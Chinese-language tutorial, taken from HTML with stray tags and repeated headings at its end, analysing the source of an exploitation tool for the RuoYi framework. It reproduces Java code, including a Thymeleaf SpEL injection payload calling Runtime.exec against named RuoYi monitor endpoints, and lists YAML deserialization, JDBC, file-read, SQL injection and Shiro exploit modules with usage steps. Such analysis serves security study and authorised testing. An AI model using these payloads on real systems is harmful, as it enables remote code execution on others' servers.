若依一把梭哈工具源码分析与教学文档<\/h1>

1. 工具概述<\/h2>
若依一把梭哈工具是一个针对若依(RuoYi)框架的安全测试工具，集成了若依框架的多个历史漏洞利用模块。该工具采用JavaFX开发，提供了图形化界面，方便安全研究人员进行漏洞检测和利用。<\/p>

2. 工具界面与功能模块<\/h2>

2.1 界面布局<\/h3>

工具界面主要分为三个核心模块：<\/p>

基础配置模块<\/strong>：<\/p>

URL地址输入框<\/li>
Cookie输入框<\/li>
配置确定按钮<\/li> <\/ul> <\/li>

漏洞利用分类模块<\/strong>：<\/p>

包含若依框架的各种历史漏洞选项<\/li> <\/ul> <\/li>

利用参数配置模块<\/strong>：<\/p>

针对特定漏洞的参数配置区域<\/li>
执行按钮<\/li>
结果显示区域<\/li> <\/ul> <\/li> <\/ol>
2.2 功能分类<\/h3>
工具主要功能包括：<\/p>

若依框架识别<\/li>
漏洞扫描<\/li>
特定漏洞利用<\/li>
结果展示<\/li> <\/ul>
3. 核心源码分析<\/h2>
3.1 Config类分析<\/h3>
Config<\/code>类作为全局配置类，存储了工具运行所需的各种配置参数和请求方法。<\/p>
public<\/span> class<\/span> Config<\/span> {<\/span> <\/span><\/span> \/\/ 静态配置变量 <\/span><\/span><\/span><\/span> public<\/span> static<\/span> String url;<\/span> <\/span><\/span> public<\/span> static<\/span> String cookie;<\/span> <\/span><\/span> public<\/span> static<\/span> Boolean isConnected =<\/span> false<\/span>;<\/span> <\/span><\/span> public<\/span> static<\/span> String snakeyamlUrl =<\/span> ""<\/span>;<\/span> <\/span><\/span> public<\/span> static<\/span> TextArea resultText;<\/span> <\/span><\/span> public<\/span> static<\/span> String jobId;<\/span> <\/span><\/span> public<\/span> static<\/span> List<<\/span>String><\/span> vulMode =<\/span> new<\/span> ArrayList();<\/span> <\/span><\/span> public<\/span> static<\/span> String uploadPath =<\/span> ""<\/span>;<\/span> <\/span><\/span> public<\/span> static<\/span> File jarFile =<\/span> null<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ 若依API路径常量 <\/span><\/span><\/span><\/span> public<\/span> static<\/span> final<\/span> String jobListPath =<\/span> "\/monitor\/job\/list"<\/span>;<\/span> <\/span><\/span> public<\/span> static<\/span> final<\/span> String jobAddPath =<\/span> "\/monitor\/job\/add"<\/span>;<\/span> <\/span><\/span> \/\/ ...其他路径常量 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 请求方法 <\/span><\/span><\/span><\/span> public<\/span> static<\/span> String get<\/span>(<\/span>String path)<\/span> {<\/span> <\/span><\/span> return<\/span> RequestUtil.<\/span>get<\/span>(<\/span>url +<\/span> path,<\/span> cookie);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> String post<\/span>(<\/span>String path,<\/span> String param)<\/span> {<\/span> <\/span><\/span> return<\/span> RequestUtil.<\/span>post<\/span>(<\/span>url +<\/span> path,<\/span> param,<\/span> cookie);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ...其他请求方法 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2 MainController类分析<\/h3> MainController<\/code>类是工具的核心控制类，负责处理用户交互和漏洞利用流程。<\/p> 配置功能实现<\/h4> public<\/span> void<\/span> config<\/span>()<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>configConn<\/span> =<\/span> false<\/span>;<\/span> <\/span><\/span> ResultUtil.<\/span>clear<\/span>();<\/span> <\/span><\/span> Config.<\/span>url<\/span> =<\/span> this<\/span>.<\/span>urlText<\/span>.<\/span>getText<\/span>();<\/span> <\/span><\/span> Config.<\/span>cookie<\/span> =<\/span> this<\/span>.<\/span>cookieText<\/span>.<\/span>getText<\/span>();<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (!<\/span>Config.<\/span>url<\/span>.<\/span>isEmpty<\/span>()<\/span> &&<\/span> !<\/span>Config.<\/span>cookie<\/span>.<\/span>isEmpty<\/span>())<\/span> {<\/span> <\/span><\/span> String resp =<\/span> RequestUtil.<\/span>get<\/span>(<\/span>Config.<\/span>url<\/span>,<\/span> Config.<\/span>cookie<\/span>);<\/span> <\/span><\/span> Pattern pattern =<\/span> Pattern.<\/span>compile<\/span>(<\/span>"<p>(.*?)<\/p>"<\/span>);<\/span> <\/span><\/span> Matcher matcher =<\/span> pattern.<\/span>matcher<\/span>(<\/span>resp);<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>matcher.<\/span>find<\/span>())<\/span> {<\/span> <\/span><\/span> List<<\/span>String><\/span> jobList =<\/span> JobUtil.<\/span>getList<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>jobList.<\/span>isEmpty<\/span>())<\/span> {<\/span> <\/span><\/span> JobUtil.<\/span>createJob<\/span>();<\/span> <\/span><\/span> jobList =<\/span> JobUtil.<\/span>getList<\/span>();<\/span> <\/span><\/span> this<\/span>.<\/span>configConn<\/span> =<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> Config.<\/span>jobId<\/span> =<\/span> (<\/span>String)<\/span>jobList.<\/span>get<\/span>(<\/span>0<\/span>);<\/span> <\/span><\/span> ResultUtil.<\/span>success<\/span>(<\/span>"配置信息成功,Cookie有效"<\/span>);<\/span> <\/span><\/span> this<\/span>.<\/span>configConn<\/span> =<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> ResultUtil.<\/span>success<\/span>(<\/span>"配置信息成功,Cookie无效"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> ResultUtil.<\/span>success<\/span>(<\/span>"配置信息失败"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞扫描功能实现<\/h4> public<\/span> void<\/span> conn<\/span>()<\/span> {<\/span> <\/span><\/span> ResultUtil.<\/span>clear<\/span>();<\/span> <\/span><\/span> Runnable runnable =<\/span> ()<\/span> -><\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>vulText<\/span>.<\/span>appendText<\/span>(<\/span>"正在扫描全部漏洞,请耐心等待~\r\n"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>this<\/span>.<\/span>configConn<\/span>)<\/span> {<\/span> <\/span><\/span> VulScan.<\/span>scan<\/span>();<\/span> \/\/ 全量扫描 <\/span><\/span><\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> ResultUtil.<\/span>fail<\/span>(<\/span>"网络异常或Cookie无效,只进行Shiro框架识别与key探测"<\/span>);<\/span> <\/span><\/span> VulScan.<\/span>ShiroTest<\/span>();<\/span> \/\/ 仅Shiro测试 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> };<\/span> <\/span><\/span> Thread workThrad =<\/span> new<\/span> Thread(<\/span>runnable);<\/span> <\/span><\/span> workThrad.<\/span>start<\/span>();<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 漏洞利用实现示例（Thymeleaf模板注入）<\/h3> public<\/span> static<\/span> boolean<\/span> check<\/span>(<\/span>String cmd)<\/span> {<\/span> <\/span><\/span> \/\/ 构造SPEL表达式 <\/span><\/span><\/span><\/span> String payload =<\/span> "(${T(java.lang.Runtime).getRuntime().exec(\""<\/span> +<\/span> cmd +<\/span> "\")})"<\/span>;<\/span> <\/span><\/span> String encodedPayload =<\/span> ""<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ URL编码 <\/span><\/span><\/span><\/span> char<\/span>[]<\/span> var3 =<\/span> payload.<\/span>toCharArray<\/span>();<\/span> <\/span><\/span> for<\/span> (<\/span>char<\/span> c :<\/span> var3)<\/span> {<\/span> <\/span><\/span> encodedPayload =<\/span> encodedPayload +<\/span> "%"<\/span> +<\/span> Integer.<\/span>toHexString<\/span>(<\/span>c);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 测试多个可能的注入点 <\/span><\/span><\/span><\/span> String url1 =<\/span> "\/monitor\/cache\/getNames?fragment=header("<\/span> +<\/span> encodedPayload +<\/span> ")"<\/span>;<\/span> <\/span><\/span> String url2 =<\/span> "\/monitor\/cache\/getKeys?fragment=header("<\/span> +<\/span> encodedPayload +<\/span> ")"<\/span>;<\/span> <\/span><\/span> \/\/ ...其他URL <\/span><\/span><\/span><\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String post3 =<\/span> Config.<\/span>post<\/span>(<\/span>url1,<\/span> ""<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>post3.<\/span>contains<\/span>(<\/span>"getNames"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception var11)<\/span> {}<\/span> <\/span><\/span> \/\/ ...其他URL测试 <\/span><\/span><\/span><\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 工具使用教学<\/h2> 4.1 基本使用流程<\/h3> 配置目标信息<\/strong>：<\/p> 在URL输入框中输入目标若依系统的地址<\/li> 在Cookie输入框中输入有效的会话Cookie<\/li> 点击"确定"按钮验证配置<\/li> <\/ul> <\/li> 漏洞扫描<\/strong>：<\/p> 点击"扫描"按钮开始全量漏洞扫描<\/li> 如果配置无效，工具会自动降级为仅Shiro检测<\/li> <\/ul> <\/li> 特定漏洞利用<\/strong>：<\/p> 在漏洞分类标签页中选择特定漏洞<\/li> 输入必要的利用参数<\/li> 点击执行按钮进行利用<\/li> <\/ul> <\/li> <\/ol> 4.2 关键功能详解<\/h3> 4.2.1 配置验证机制<\/h4> 工具通过以下方式验证配置有效性：<\/p> 发送GET请求到目标URL<\/li> 检查响应中是否包含<p><\/code>标签<\/li> 如果验证通过，设置configConn<\/code>为true<\/li> <\/ol> 4.2.2 漏洞扫描流程<\/h4> 全量扫描调用VulScan.scan()<\/code>方法，依次检测：<\/p> Yaml反序列化漏洞<\/li> JDBC注入漏洞<\/li> 任意文件读取漏洞<\/li> Thymeleaf模板注入漏洞<\/li> SQL注入漏洞<\/li> Shiro相关漏洞<\/li> <\/ol> 4.2.3 请求处理机制<\/h4> 工具使用RequestUtil<\/code>类统一处理HTTP请求，支持：<\/p> GET请求<\/li> POST请求<\/li> 文件上传<\/li> 特殊头部的请求<\/li> <\/ul> 5. 漏洞利用技术分析<\/h2> 5.1 Thymeleaf模板注入<\/h3> 漏洞原理<\/strong>：若依框架在使用Thymeleaf模板引擎时，未对用户输入进行充分过滤，导致SPEL表达式注入。<\/p> 利用方式<\/strong>：<\/p> 构造恶意的SPEL表达式<\/li> 对表达式进行URL编码<\/li> 尝试在多个已知的Thymeleaf端点注入<\/li> <\/ol> 关键代码<\/strong>：<\/p> String payload =<\/span> "(${T(java.lang.Runtime).getRuntime().exec(\""<\/span> +<\/span> cmd +<\/span> "\")})"<\/span>;<\/span> <\/span><\/span>String encodedPayload =<\/span> ""<\/span>;<\/span> <\/span><\/span>for<\/span> (<\/span>char<\/span> c :<\/span> payload.<\/span>toCharArray<\/span>())<\/span> {<\/span> <\/span><\/span> encodedPayload =<\/span> encodedPayload +<\/span> "%"<\/span> +<\/span> Integer.<\/span>toHexString<\/span>(<\/span>c);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.2 其他漏洞类型<\/h3> 工具还实现了以下漏洞的检测和利用：<\/p> YAML反序列化<\/strong>：通过snakeyaml<\/code>库的漏洞实现RCE<\/li> JDBC注入<\/strong>：利用若依的JDBC连接功能实现注入<\/li> 文件读取<\/strong>：利用若依的文件处理功能读取系统文件<\/li> SQL注入<\/strong>：针对若依特定接口的SQL注入<\/li> Shiro漏洞<\/strong>：包括Shiro的rememberMe反序列化漏洞<\/li> <\/ul> 6. 工具开发技巧<\/h2> 6.1 JavaFX界面开发<\/h3> FXML布局<\/strong>：使用FXML文件定义界面布局<\/li> 控制器绑定<\/strong>：通过fx:controller<\/code>属性绑定控制器类<\/li> 事件处理<\/strong>：使用lambda表达式简化事件处理<\/li> <\/ol> 示例：<\/p> <Button<\/span> fx:id=<\/span>"submitBtn"<\/span> mnemonicParsing=<\/span>"false"<\/span> prefWidth=<\/span>"80.0"<\/span> text=<\/span>"扫描"<\/span>><\/span> <\/span><\/span> <HBox.margin><\/span> <\/span><\/span> <Insets<\/span> left=<\/span>"20.0"<\/span>\/><\/span> <\/span><\/span> <\/HBox.margin><\/span> <\/span><\/span><\/Button><\/span> <\/span><\/span><\/code><\/pre>6.2 多线程处理<\/h3> 工具使用多线程处理耗时操作，避免界面卡顿：<\/p> Runnable runnable =<\/span> ()<\/span> -><\/span> {<\/span> <\/span><\/span> \/\/ 扫描逻辑 <\/span><\/span><\/span><\/span>};<\/span> <\/span><\/span>Thread workThrad =<\/span> new<\/span> Thread(<\/span>runnable);<\/span> <\/span><\/span>workThrad.<\/span>start<\/span>();<\/span> <\/span><\/span><\/code><\/pre>6.3 模块化设计<\/h3> 工具采用模块化设计：<\/p> 配置模块<\/strong>：Config类<\/li> 请求模块<\/strong>：RequestUtil类<\/li> 漏洞模块<\/strong>：各漏洞的Exp类<\/li> 工具模块<\/strong>：各种Util类<\/li> <\/ol> 7. 安全注意事项<\/h2> 合法使用<\/strong>：该工具仅用于授权测试，未经授权使用可能违法<\/li> 风险提示<\/strong>：漏洞利用可能对目标系统造成破坏<\/li> 防护建议<\/strong>：若依用户应及时更新框架，修复已知漏洞<\/li> <\/ol> 8. 总结<\/h2> 若依一把梭哈工具是一个功能全面的若依框架安全测试工具，通过分析其源码可以学习到：<\/p> JavaFX图形界面开发技巧<\/li> 漏洞检测与利用的实现原理<\/li> 模块化的代码组织方式<\/li> 安全工具的开发思路<\/li> <\/ol> 该工具对若依框架的各种历史漏洞进行了系统性的集成，是学习Web安全工具开发的优秀参考案例。<\/p>

若依一把梭哈工具源码分析与教学文档<\/h1>

1. 工具概述<\/h2> 若依一把梭哈工具是一个针对若依(RuoYi)框架的安全测试工具，集成了若依框架的多个历史漏洞利用模块。该工具采用JavaFX开发，提供了图形化界面，方便安全研究人员进行漏洞检测和利用。<\/p>

2. 工具界面与功能模块<\/h2>

3. 核心源码分析<\/h2>

3.2 MainController类分析<\/h3> MainController<\/code>类是工具的核心控制类，负责处理用户交互和漏洞利用流程。<\/p>

4. 工具使用教学<\/h2>

4.2 关键功能详解<\/h3>

5. 漏洞利用技术分析<\/h2>

6. 工具开发技巧<\/h2>

1. 工具概述<\/h2>
若依一把梭哈工具是一个针对若依(RuoYi)框架的安全测试工具，集成了若依框架的多个历史漏洞利用模块。该工具采用JavaFX开发，提供了图形化界面，方便安全研究人员进行漏洞检测和利用。<\/p>

3.2 MainController类分析<\/h3>
`MainController<\/code>类是工具的核心控制类，负责处理用户交互和漏洞利用流程。<\/p>`